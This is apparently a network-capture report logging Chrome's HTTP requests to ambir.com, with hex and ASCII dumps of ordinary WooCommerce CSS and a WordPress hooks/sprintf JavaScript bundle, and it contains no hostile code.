                                                                                                                                                                                              2024-11-20 20:28:20 UTC893INData Raw: 35 34 64 33 0d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 6e 65 72 5f 5f 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 35 38 35 36 2c 2e 30 37 30 33 2c 2e 34 31 34 33 2c 2e 39 32 39 37 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 74 75 72 6e 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 6c 6f 61 64 69 6e 67 5f 5f 61 6e 69 6d 61 74 69 6f 6e 7b 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 31 30 30 25 29 7d 7d 62 6f 64 79 2e 77 63 2d 62 6c 6f 63 6b 2d 70 72 6f 64 75 63 74 2d 67 61 6c 6c 65 72 79 2d 6d 6f 64 61 6c 2d 6f 70 65 6e
                                                                                                                                                                                              Data Ascii: 54d3@keyframes spinner__animation{0%{animation-timing-function:cubic-bezier(.5856,.0703,.4143,.9297);transform:rotate(0deg)}to{transform:rotate(1turn)}}@keyframes loading__animation{to{transform:translateX(100%)}}body.wc-block-product-gallery-modal-open
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 63 6b 2d 67 72 69 64 5f 5f 70 72 6f 64 75 63 74 2d 74 69 74 6c 65 2c 2e 77 63 2d 62 6c 6f 63 6b 2d 67 72 69 64 5f 5f 70 72 6f 64 75 63 74 2d 74 69 74 6c 65 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 77 63 2d 62 6c 6f 63 6b 2d 67 72 69 64 5f 5f 70 72 6f 64 75 63 74 2d 70 72 69 63 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 77 63 2d 62 6c 6f 63 6b 2d 67 72 69 64 5f 5f 70 72 6f 64 75 63 74 2d 70 72 69 63 65 20 2e 77 63 2d 62 6c 6f 63 6b 2d 67 72 69 64 5f 5f 70 72 6f 64
                                                                                                                                                                                              Data Ascii: ck-grid__product-title,.wc-block-grid__product-title{color:inherit;display:block;font-family:inherit;font-size:inherit;font-weight:700;line-height:1.2;padding:0}.wc-block-grid__product-price{display:block}.wc-block-grid__product-price .wc-block-grid__prod
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 69 64 5f 5f 70 72 6f 64 75 63 74 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 61 66 74 65 72 2c 2e 68 61 73 2d 38 2d 63 6f 6c 75 6d 6e 73 20 2e 77 63 2d 62 6c 6f 63 6b 2d 67 72 69 64 5f 5f 70 72 6f 64 75 63 74 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 61 66 74 65 72 2c 2e 68 61 73 2d 39 2d 63 6f 6c 75 6d 6e 73 20 2e 77 63 2d 62 6c 6f 63 6b 2d 67 72 69 64 5f 5f 70 72 6f 64 75 63 74 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a
                                                                                                                                                                                              Data Ascii: id__product-add-to-cart.wp-block-button .wp-block-button__link:after,.has-8-columns .wc-block-grid__product-add-to-cart.wp-block-button .wp-block-button__link:after,.has-9-columns .wc-block-grid__product-add-to-cart.wp-block-button .wp-block-button__link:
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 73 6f 6c 69 64 20 23 34 33 34 35 34 62 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 63 6f 6c 6f 72 3a 23 34 33 34 35 34 62 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 65 66 74 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 2e 32 35 65 6d 20 2e 37 35 65 6d 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 34 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 3b 74 6f 70 3a 34 70 78 3b 77 69 64 74 68 3a 61 75 74 6f 3b 7a 2d 69 6e 64 65 78 3a 39 7d 2e 77 63 2d 62 6c 6f 63 6b 2d 67 72 69 64 5f 5f 70 72 6f 64 75 63 74 20 2e
                                                                                                                                                                                              Data Ascii: solid #43454b;border-radius:4px;color:#43454b;display:inline-block;font-size:.875em;font-weight:600;left:auto;padding:.25em .75em;position:absolute;right:4px;text-align:center;text-transform:uppercase;top:4px;width:auto;z-index:9}.wc-block-grid__product .
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 63 6f 6d 70 6f 6e 65 6e 74 73 2d 70 72 6f 64 75 63 74 2d 73 61 6c 65 2d 62 61 64 67 65 2c 2e 74 68 65 6d 65 2d 74 77 65 6e 74 79 6e 69 6e 65 74 65 65 6e 20 2e 77 63 2d 62 6c 6f 63 6b 2d 67 72 69 64 5f 5f 70 72 6f 64 75 63 74 2d 6f 6e 73 61 6c 65 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 7d 2e 74 68 65 6d 65 2d 74 77 65 6e 74 79 6e 69 6e 65 74 65 65 6e 20 2e 65 64 69 74 6f 72 2d 73 74 79 6c 65 73 2d 77 72 61 70 70 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 74 77 65 6e 74 79 74 77 65 6e 74 79 20 2e 77 63 2d 62 6c 6f 63 6b 2d 67 72 69 64 5f 5f 70 72 6f 64 75
                                                                                                                                                                                              Data Ascii: components-product-sale-badge,.theme-twentynineteen .wc-block-grid__product-onsale{line-height:1}.theme-twentynineteen .editor-styles-wrapper .wp-block-button .wp-block-button__link:not(.has-text-color){color:#fff}.theme-twentytwenty .wc-block-grid__produ
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 6e 67 5f 5f 73 74 61 72 73 2c 2e 74 68 65 6d 65 2d 74 77 65 6e 74 79 74 77 65 6e 74 79 20 2e 73 74 61 72 2d 72 61 74 69 6e 67 20 2e 77 63 2d 62 6c 6f 63 6b 2d 67 72 69 64 5f 5f 70 72 6f 64 75 63 74 2d 72 61 74 69 6e 67 5f 5f 73 74 61 72 73 2c 2e 74 68 65 6d 65 2d 74 77 65 6e 74 79 74 77 65 6e 74 79 20 2e 77 63 2d 62 6c 6f 63 6b 2d 67 72 69 64 5f 5f 70 72 6f 64 75 63 74 2d 72 61 74 69 6e 67 20 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 70 72 6f 64 75 63 74 2d 72 61 74 69 6e 67 5f 5f 73 74 61 72 73 2c 2e 74 68 65 6d 65 2d 74 77 65 6e 74 79 74 77 65 6e 74 79 20 2e 77 63 2d 62 6c 6f 63 6b 2d 67 72 69 64 5f 5f 70 72 6f 64 75 63 74 2d 72 61 74 69 6e 67 20 2e 77 63 2d 62 6c 6f 63 6b 2d 67 72 69 64 5f 5f 70 72 6f 64 75 63 74 2d 72 61 74 69 6e
                                                                                                                                                                                              Data Ascii: ng__stars,.theme-twentytwenty .star-rating .wc-block-grid__product-rating__stars,.theme-twentytwenty .wc-block-grid__product-rating .wc-block-components-product-rating__stars,.theme-twentytwenty .wc-block-grid__product-rating .wc-block-grid__product-ratin
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 20 2e 77 63 2d 62 6c 6f 63 6b 2d 70 72 69 63 65 2d 66 69 6c 74 65 72 5f 5f 74 69 74 6c 65 2c 2e 74 68 65 6d 65 2d 74 77 65 6e 74 79 74 77 65 6e 74 79 20 2e 77 63 2d 62 6c 6f 63 6b 2d 73 74 6f 63 6b 2d 66 69 6c 74 65 72 5f 5f 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 74 68 65 6d 65 2d 74 77 65 6e 74 79 74 77 65 6e 74 79 20 2e 77 63 2d 62 6c 6f 63 6b 2d 61 63 74 69 76 65 2d 66 69 6c 74 65 72 73 20 2e 77 63 2d 62 6c 6f 63 6b 2d 61 63 74 69 76 65 2d 66 69 6c 74 65 72 73 5f 5f 63 6c 65 61 72 2d 61 6c 6c 2c 2e 74 68 65 6d 65 2d 74 77 65 6e 74 79 74 77 65 6e 74 79 20 2e 77 63 2d 62 6c 6f 63 6b 2d 67 72 69 64 5f 5f 70 72 6f 64 75 63 74 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 20 2e 77 70 2d 62 6c 6f
                                                                                                                                                                                              Data Ascii: .wc-block-price-filter__title,.theme-twentytwenty .wc-block-stock-filter__title{font-size:1em}.theme-twentytwenty .wc-block-active-filters .wc-block-active-filters__clear-all,.theme-twentytwenty .wc-block-grid__product-add-to-cart.wp-block-button .wp-blo
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 67 72 6f 75 70 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2e 70 72 6f 64 75 63 74 20 2e 75 70 2d 73 65 6c 6c 73 2e 75 70 73 65 6c 6c 73 2e 70 72 6f 64 75 63 74 73 7b 6d 61 78 2d 77 69 64 74 68 3a 76 61 72 28 2d 2d 77 70 2d 2d 73 74 79 6c 65 2d 2d 67 6c 6f 62 61 6c 2d 2d 77 69 64 65 2d 73 69 7a 65 29 7d 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 6e 65 72 5f 5f 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 35 38 35 36 2c 2e 30 37 30 33 2c 2e 34 31 34 33 2c 2e 39 32 39 37 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 74 75 72 6e
                                                                                                                                                                                              Data Ascii: }.wp-block-group.woocommerce.product .up-sells.upsells.products{max-width:var(--wp--style--global--wide-size)}@keyframes spinner__animation{0%{animation-timing-function:cubic-bezier(.5856,.0703,.4143,.9297);transform:rotate(0deg)}to{transform:rotate(1turn
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 6f 6e 65 6e 74 73 2d 6e 6f 74 69 63 65 2d 62 61 6e 6e 65 72 5f 5f 63 6f 6e 74 65 6e 74 20 75 6c 20 6c 69 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 6e 6f 74 69 63 65 2d 62 61 6e 6e 65 72 3e 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 6e 6f 74 69 63 65 2d 62 61 6e 6e 65 72 5f 5f 63 6f 6e 74 65 6e 74 20 2e 77 63 2d 66 6f 72 77 61 72 64 7b 2d 6d 6f 7a 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 30 3b 63 6f 6c 6f 72 3a 23
                                                                                                                                                                                              Data Ascii: onents-notice-banner__content ul li:after{clear:both;content:"";display:block}.wc-block-components-notice-banner>.wc-block-components-notice-banner__content .wc-forward{-moz-appearance:none;appearance:none;background:transparent!important;border:0;color:#
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 6f 6e 65 6e 74 73 2d 62 75 74 74 6f 6e 3a 61 63 74 69 76 65 2c 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 6e 6f 74 69 63 65 2d 62 61 6e 6e 65 72 3e 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 2c 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 6e 6f 74 69 63 65 2d 62 61 6e 6e 65 72 3e 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 62 75 74 74 6f 6e 3a 68 6f 76 65 72 7b 6f 70 61 63 69 74 79 3a 31 7d 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 6e 6f 74 69 63 65 2d 62 61 6e 6e 65 72 2e 69 73 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 30 66 30 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 63 63 31
                                                                                                                                                                                              Data Ascii: onents-button:active,.wc-block-components-notice-banner>.wc-block-components-button:focus,.wc-block-components-notice-banner>.wc-block-components-button:hover{opacity:1}.wc-block-components-notice-banner.is-error{background-color:#fff0f0;border-color:#cc1


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              26192.168.2.549739141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:19 UTC602OUTGET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-71030d0b.min.js HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:20 UTC490INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:19 GMT
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 18:27:07 GMT
                                                                                                                                                                                              ETag: W/"673e29fb-65fa"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 6832
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f902d970f75-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:20 UTC879INData Raw: 36 35 66 61 0d 0a 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 7b 64 3a 28 65 2c 6e 29 3d 3e 7b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 6e 29 74 2e 6f 28 6e 2c 72 29 26 26 21 74 2e 6f 28 65 2c 72 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 6e 5b 72 5d 7d 29 7d 2c 6f 3a 28 74 2c 65 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 65 29 2c 72 3a 74 3d 3e 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d
                                                                                                                                                                                              Data Ascii: 65fa/*! This file is auto-generated */(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Sym
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 2f 5e 5b 61 2d 7a 41 2d 5a 5d 5b 61 2d 7a 41 2d 5a 30 2d 39 5f 2e 5c 2d 5c 2f 5d 2a 24 2f 2e 74 65 73 74 28 74 29 7c 7c 28 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 54 68 65 20 6e 61 6d 65 73 70 61 63 65 20 63 61 6e 20 6f 6e 6c 79 20 63 6f 6e 74 61 69 6e 20 6e 75 6d 62 65 72 73 2c 20 6c 65 74 74 65 72 73 2c 20 64 61 73 68 65 73 2c 20 70 65 72 69 6f 64 73 2c 20 75 6e 64 65 72 73 63 6f 72 65 73 20 61 6e 64 20 73 6c 61 73 68 65 73 2e 22 29 2c 21 31 29 7d 3b 63 6f 6e 73 74 20 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 7c 7c 22 22 3d 3d 3d 74 3f 28 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 54 68 65 20 68 6f 6f 6b 20 6e 61 6d 65 20 6d 75 73 74 20 62 65 20 61 20 6e 6f 6e 2d 65 6d 70 74
                                                                                                                                                                                              Data Ascii: /^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(t)||(console.error("The namespace can only contain numbers, letters, dashes, periods, underscores and slashes."),!1)};const r=function(t){return"string"!=typeof t||""===t?(console.error("The hook name must be a non-empt
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 65 28 65 2c 31 29 2c 6c 2b 2b 2c 63 2e 5f 5f 63 75 72 72 65 6e 74 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 74 2e 6e 61 6d 65 3d 3d 3d 69 26 26 74 2e 63 75 72 72 65 6e 74 49 6e 64 65 78 3e 3d 65 26 26 74 2e 63 75 72 72 65 6e 74 49 6e 64 65 78 2d 2d 7d 29 29 29 7d 72 65 74 75 72 6e 22 68 6f 6f 6b 52 65 6d 6f 76 65 64 22 21 3d 3d 69 26 26 74 2e 64 6f 41 63 74 69 6f 6e 28 22 68 6f 6f 6b 52 65 6d 6f 76 65 64 22 2c 69 2c 73 29 2c 6c 7d 7d 3b 63 6f 6e 73 74 20 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 29 7b 63 6f 6e 73 74 20 6f 3d 74 5b 65 5d 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 72 3f 6e 20 69 6e 20 6f 26 26 6f 5b 6e 5d 2e 68 61 6e 64 6c 65 72 73 2e 73 6f 6d 65 28 28 74 3d 3e 74 2e 6e
                                                                                                                                                                                              Data Ascii: e(e,1),l++,c.__current.forEach((t=>{t.name===i&&t.currentIndex>=e&&t.currentIndex--})))}return"hookRemoved"!==i&&t.doAction("hookRemoved",i,s),l}};const s=function(t,e){return function(n,r){const o=t[e];return void 0!==r?n in o&&o[n].handlers.some((t=>t.n
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 29 2c 74 68 69 73 2e 72 65 6d 6f 76 65 41 6c 6c 41 63 74 69 6f 6e 73 3d 69 28 74 68 69 73 2c 22 61 63 74 69 6f 6e 73 22 2c 21 30 29 2c 74 68 69 73 2e 72 65 6d 6f 76 65 41 6c 6c 46 69 6c 74 65 72 73 3d 69 28 74 68 69 73 2c 22 66 69 6c 74 65 72 73 22 2c 21 30 29 2c 74 68 69 73 2e 64 6f 41 63 74 69 6f 6e 3d 63 28 74 68 69 73 2c 22 61 63 74 69 6f 6e 73 22 29 2c 74 68 69 73 2e 61 70 70 6c 79 46 69 6c 74 65 72 73 3d 63 28 74 68 69 73 2c 22 66 69 6c 74 65 72 73 22 2c 21 30 29 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 41 63 74 69 6f 6e 3d 6c 28 74 68 69 73 2c 22 61 63 74 69 6f 6e 73 22 29 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 46 69 6c 74 65 72 3d 6c 28 74 68 69 73 2c 22 66 69 6c 74 65 72 73 22 29 2c 74 68 69 73 2e 64 6f 69 6e 67 41 63 74 69 6f 6e 3d 75 28 74 68 69
                                                                                                                                                                                              Data Ascii: ),this.removeAllActions=i(this,"actions",!0),this.removeAllFilters=i(this,"filters",!0),this.doAction=c(this,"actions"),this.applyFilters=c(this,"filters",!0),this.currentAction=l(this,"actions"),this.currentFilter=l(this,"filters"),this.doingAction=u(thi
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 3d 30 3b 6f 3c 73 2e 6b 65 79 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 7b 69 66 28 6e 75 6c 6c 3d 3d 72 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 61 28 27 5b 73 70 72 69 6e 74 66 5d 20 43 61 6e 6e 6f 74 20 61 63 63 65 73 73 20 70 72 6f 70 65 72 74 79 20 22 25 73 22 20 6f 66 20 75 6e 64 65 66 69 6e 65 64 20 76 61 6c 75 65 20 22 25 73 22 27 2c 73 2e 6b 65 79 73 5b 6f 5d 2c 73 2e 6b 65 79 73 5b 6f 2d 31 5d 29 29 3b 72 3d 72 5b 73 2e 6b 65 79 73 5b 6f 5d 5d 7d 65 6c 73 65 20 72 3d 73 2e 70 61 72 61 6d 5f 6e 6f 3f 65 5b 73 2e 70 61 72 61 6d 5f 6e 6f 5d 3a 65 5b 64 2b 2b 5d 3b 69 66 28 69 2e 6e 6f 74 5f 74 79 70 65 2e 74 65 73 74 28 73 2e 74 79 70 65 29 26 26 69 2e 6e 6f 74 5f 70 72 69 6d 69 74 69 76 65 2e 74 65 73 74 28 73 2e 74 79 70 65 29 26 26 72 20
                                                                                                                                                                                              Data Ascii: =0;o<s.keys.length;o++){if(null==r)throw new Error(a('[sprintf] Cannot access property "%s" of undefined value "%s"',s.keys[o],s.keys[o-1]));r=r[s.keys[o]]}else r=s.param_no?e[s.param_no]:e[d++];if(i.not_type.test(s.type)&&i.not_primitive.test(s.type)&&r
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 6e 67 28 31 36 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 58 22 3a 72 3d 28 70 61 72 73 65 49 6e 74 28 72 2c 31 30 29 3e 3e 3e 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 7d 69 2e 6a 73 6f 6e 2e 74 65 73 74 28 73 2e 74 79 70 65 29 3f 67 2b 3d 72 3a 28 21 69 2e 6e 75 6d 62 65 72 2e 74 65 73 74 28 73 2e 74 79 70 65 29 7c 7c 63 26 26 21 73 2e 73 69 67 6e 3f 66 3d 22 22 3a 28 66 3d 63 3f 22 2b 22 3a 22 2d 22 2c 72 3d 72 2e 74 6f 53 74 72 69 6e 67 28 29 2e 72 65 70 6c 61 63 65 28 69 2e 73 69 67 6e 2c 22 22 29 29 2c 75 3d 73 2e 70 61 64 5f 63 68 61 72 3f 22 30 22 3d 3d 3d 73 2e 70 61 64 5f 63 68 61 72 3f 22 30 22 3a 73 2e 70 61 64 5f 63 68 61 72 2e 63 68 61 72 41 74 28 31 29 3a 22 20 22 2c 70 3d 73 2e 77 69 64 74 68 2d 28
                                                                                                                                                                                              Data Ascii: ng(16);break;case"X":r=(parseInt(r,10)>>>0).toString(16).toUpperCase()}i.json.test(s.type)?g+=r:(!i.number.test(s.type)||c&&!s.sign?f="":(f=c?"+":"-",r=r.toString().replace(i.sign,"")),u=s.pad_char?"0"===s.pad_char?"0":s.pad_char.charAt(1):" ",p=s.width-(
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 28 77 69 6e 64 6f 77 2e 73 70 72 69 6e 74 66 3d 61 2c 77 69 6e 64 6f 77 2e 76 73 70 72 69 6e 74 66 3d 6f 2c 76 6f 69 64 20 30 3d 3d 3d 28 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 73 70 72 69 6e 74 66 3a 61 2c 76 73 70 72 69 6e 74 66 3a 6f 7d 7d 2e 63 61 6c 6c 28 65 2c 72 2c 65 2c 74 29 29 7c 7c 28 74 2e 65 78 70 6f 72 74 73 3d 6e 29 29 7d 28 29 7d 7d 2c 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 28 6e 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 69 29 72 65 74 75 72 6e 20 69 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 61 3d 65 5b 6e 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 6e 5d 28 61 2c 61 2e 65 78 70 6f 72 74 73 2c 72 29 2c 61 2e 65 78
                                                                                                                                                                                              Data Ascii: ypeof window&&(window.sprintf=a,window.vsprintf=o,void 0===(n=function(){return{sprintf:a,vsprintf:o}}.call(e,r,e,t))||(t.exports=n))}()}},e={};function r(n){var i=e[n];if(void 0!==i)return i.exports;var a=e[n]={exports:{}};return t[n](a,a.exports,r),a.ex
